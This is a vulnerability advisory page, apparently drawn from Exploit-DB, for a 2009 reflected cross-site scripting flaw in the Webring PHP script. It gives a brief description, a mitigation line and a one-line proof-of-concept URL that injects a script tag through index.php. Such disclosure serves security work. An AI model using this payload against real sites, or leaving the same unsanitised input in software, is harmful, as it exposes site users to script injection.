webring Cross Site Scripting Vulnerability

vendor:

Webring

by:

indoushka

7.5

CVSS

HIGH

XSS

CWE

Product Name: Webring

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu)

2009

webring Cross Site Scripting Vulnerability

A Cross-Site Scripting (XSS) vulnerability was discovered in Webring, which allows remote attackers to inject arbitrary web script or HTML via the index.php page. An attacker can exploit this vulnerability by sending a malicious URL to an unsuspecting user. When the user clicks on the URL, the malicious script will be executed in the user's browser.

Mitigation:

Input validation should be used to prevent Cross-Site Scripting (XSS) attacks. Sanitize user input and output to prevent malicious code from being executed.

Source

Exploit-DB raw data:

========================================================================================
| # Title    : webring Cross Site Scripting Vulnerability                              |
| # Author   : indoushka                                                               |
| # email    : indoushka@hotmail.com                                                   |
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
| # EDB-ID   : 10675                                                                   |
| # CVE-ID   : ()                                                                      |
| # OSVDB-ID : ()                                                                      |
| # DAte     :16/12/2009                                                               |
| # Verified :                                                                         |
| # Web Site : www.iq-ty.com                                                           |
| # Published:                                                                         |
| # Script   : webring (http://www.kellishaver.com/)                                   |
| # Tested on: windows SP2 Fran&#65533;ais V.(Pnx2 2.0) + Lunix Fran&#65533;ais v.(9.4 Ubuntu)       |
| # Bug      : XSS                                                                     |
======================      Exploit By indoushka       =================================
| # Exploit  :
|
| 1- http://127.0.0.1/webring/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
|
================================   Dz-Ghost Team   ========================================
Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |
-------------------------------------------------------------------------------------------